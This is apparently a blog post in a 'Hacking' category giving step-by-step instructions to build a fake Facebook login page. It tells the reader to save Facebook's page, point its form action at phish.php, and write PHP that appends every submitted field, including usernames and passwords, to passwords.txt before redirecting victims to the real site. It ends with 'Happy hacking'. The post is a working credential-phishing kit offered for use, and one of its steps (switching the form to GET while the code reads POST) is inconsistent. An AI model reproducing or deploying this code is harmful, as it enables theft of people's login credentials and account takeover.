To create index.html:
First of all open www.facebook.com in your web browser, from “file” menu select “save as” and type “index” in file name and select “web page complete” from save as menu. Once done you will have a file named “index.html” and a folder named “index_files”. Folder will have several files in it, let them as it is and open index.html in notepad or word-pad. From edit menu select find, type action in it and locate following string.
action="https://www.facebook.com/login.php?login_attempt=1"
Now replace this string with action= “phish.php” and also change the method in html from 'post' to 'get'.
save the document.
To create phish.php:
Now open notepad type following php code in it and create phish.php.
<?php
header("Location: https://www.facebook.com/login.php?login_attempt=1 ");
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Your Done Happy hacking ^_^
Labels:
Hacking

Previous Article



Responses
0 Respones to "HOW TO CREATE UR OWN FAKE FACEBOOK LOGIN PAGE INDEX AND PHP FILES ?"
Post a Comment